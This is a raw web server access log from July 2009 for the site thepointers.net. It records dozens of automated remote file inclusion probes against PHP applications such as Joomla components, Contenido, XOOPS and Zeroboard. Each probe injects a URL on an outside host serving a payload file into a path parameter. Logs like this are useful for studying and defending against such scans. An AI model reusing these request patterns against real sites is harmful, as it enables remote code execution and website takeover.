87.229.45.106 - - [05/Jul/2009:06:13:10 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:13:10 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:13:10 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:17:53 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:17:53 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:18:02 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:19:11 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:19:11 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:19:11 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:19:32 -0700] "GET /logs/access.log/class/class.dashboard_cms.php?where_framework=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:19:42 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:19:42 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:19:42 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:19:44 -0700] "GET /class/class.dashboard_cms.php?where_framework=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:19:45 -0700] "GET /logs/class/class.dashboard_cms.php?where_framework=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:21:24 -0700] "GET /logs/access.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:21:25 -0700] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:21:27 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:21:28 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:21:28 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:21:28 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "www.thepointers.net"
70.87.217.26 - - [05/Jul/2009:06:21:50 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
70.87.217.26 - - [05/Jul/2009:06:21:50 -0700] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
70.87.217.26 - - [05/Jul/2009:06:21:50 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
70.87.217.26 - - [05/Jul/2009:06:21:51 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
70.87.217.26 - - [05/Jul/2009:06:21:51 -0700] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
70.87.217.26 - - [05/Jul/2009:06:21:52 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
70.87.217.26 - - [05/Jul/2009:06:22:47 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
70.87.217.26 - - [05/Jul/2009:06:22:49 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
69.65.41.165 - - [05/Jul/2009:06:23:47 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:26:53 -0700] "GET /logs/access.log%20/class/class.dashboard_cms.php?where_framework=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:26:54 -0700] "GET /logs/access.log%20/faqsupport/samplefaqsupport.php?path[docroot]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:27:14 -0700] "GET /logs/access_081222.log/config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:27:15 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:27:25 -0700] "GET /config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:30:26 -0700] "GET /logs/access_090409.log/config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
114.200.199.144 - - [05/Jul/2009:06:34:41 -0700] "GET /?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
114.200.199.144 - - [05/Jul/2009:06:34:41 -0700] "GET /logs//?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.thepointers.net"
114.200.199.144 - - [05/Jul/2009:06:34:42 -0700] "GET /logs/access_081222.log%20%20//?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:38:18 -0700] "GET /atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:38:18 -0700] "GET /logs/access.log/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:38:26 -0700] "GET /logs/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:38:38 -0700] "GET /logs/access_080925.log/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:41:27 -0700] "GET /logs/access.log%20/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:41:28 -0700] "GET /atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:41:31 -0700] "GET /logs/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:42:01 -0700] "GET /logs/head.php?path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:42:01 -0700] "GET /logs/access_090128.log/head.php?path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:42:04 -0700] "GET /head.php?path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
66.11.230.36 - - [05/Jul/2009:06:42:27 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:06:42:27 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:06:42:27 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
94.229.66.202 - - [05/Jul/2009:06:47:16 -0700] "GET /logs/access_090128.log%20/head.php?path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
119.93.90.155 - - [05/Jul/2009:07:01:32 -0700] "GET /logs/access.log/playing.php/common/db.php?commonpath=http://www.buy2pc.co.kr/xml/main_visual_1.xml? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
119.93.90.155 - - [05/Jul/2009:07:01:32 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://www.buy2pc.co.kr/xml/main_visual_1.xml? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
218.38.243.71 - - [05/Jul/2009:07:08:17 -0700] "GET /?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "thepointers.net"
218.38.243.71 - - [05/Jul/2009:07:08:18 -0700] "GET /logs/access.log//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
218.38.243.71 - - [05/Jul/2009:07:08:19 -0700] "GET /logs//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "thepointers.net"
218.38.243.71 - - [05/Jul/2009:07:08:26 -0700] "GET /logs//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "thepointers.net"
218.38.243.71 - - [05/Jul/2009:07:08:27 -0700] "GET /logs/access.log//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "thepointers.net"
218.38.243.71 - - [05/Jul/2009:07:08:27 -0700] "GET /?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "thepointers.net"
89.19.3.66 - - [05/Jul/2009:07:11:09 -0700] "GET /index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
89.19.3.66 - - [05/Jul/2009:07:11:09 -0700] "GET /logs/index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
89.19.3.66 - - [05/Jul/2009:07:11:09 -0700] "GET /logs/access.log/index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
122.214.48.150 - - [05/Jul/2009:07:12:16 -0700] "GET /logs/access.log/index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
122.214.48.150 - - [05/Jul/2009:07:12:16 -0700] "GET /index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
122.214.48.150 - - [05/Jul/2009:07:12:16 -0700] "GET /logs/index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:14:25 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
66.11.230.36 - - [05/Jul/2009:07:16:40 -0700] "GET /port.php?content=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
66.11.230.36 - - [05/Jul/2009:07:16:40 -0700] "GET /logs/port.php?content=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
66.11.230.36 - - [05/Jul/2009:07:16:40 -0700] "GET /logs/access_090408.log%20%20/port.php?content=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
80.67.25.1 - - [05/Jul/2009:07:18:07 -0700] "GET /logs/access.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
80.67.25.1 - - [05/Jul/2009:07:18:07 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
80.67.25.1 - - [05/Jul/2009:07:18:07 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
80.67.25.1 - - [05/Jul/2009:07:18:14 -0700] "GET /logs/access.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
80.67.25.1 - - [05/Jul/2009:07:18:14 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
80.67.25.1 - - [05/Jul/2009:07:18:14 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:23 -0700] "GET /logs/access_090413.log%20%20/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:23 -0700] "GET /logs/access_090408.log%20%20/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:23 -0700] "GET /port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:23 -0700] "GET /logs/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:24 -0700] "GET /port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:24 -0700] "GET /logs/access_090408.log%20%20/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:24 -0700] "GET /logs/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:24 -0700] "GET /logs/access_090413.log%20%20/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:28 -0700] "GET /logs/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:28 -0700] "GET /logs/access_090408.log%20%20/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:28 -0700] "GET /port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:28 -0700] "GET /logs/access_090413.log%20%20/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:19:35 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:37 -0700] "GET /port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:37 -0700] "GET /logs/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:37 -0700] "GET /logs/access_090408.log%20%20/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:07:19:37 -0700] "GET /logs/access_090413.log%20%20/port.php?content=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
69.65.41.165 - - [05/Jul/2009:07:23:02 -0700] "GET /logs/access_081222.log/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
69.65.41.165 - - [05/Jul/2009:07:23:02 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
69.65.41.165 - - [05/Jul/2009:07:23:02 -0700] "GET /logs/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:23:56 -0700] "GET /logs/access.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:23:56 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:23:56 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:23:58 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:23:58 -0700] "GET /logs/access.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:23:58 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:27:37 -0700] "GET /logs/access_090112.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:27:37 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:27:37 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.38.243.71 - - [05/Jul/2009:07:27:54 -0700] "GET /logs//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "thepointers.net"
218.38.243.71 - - [05/Jul/2009:07:27:55 -0700] "GET /?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "thepointers.net"
218.38.243.71 - - [05/Jul/2009:07:27:56 -0700] "GET /logs/access.log//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:07:35:14 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:07:35:14 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:07:35:15 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:07:35:21 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
66.11.230.36 - - [05/Jul/2009:07:35:21 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
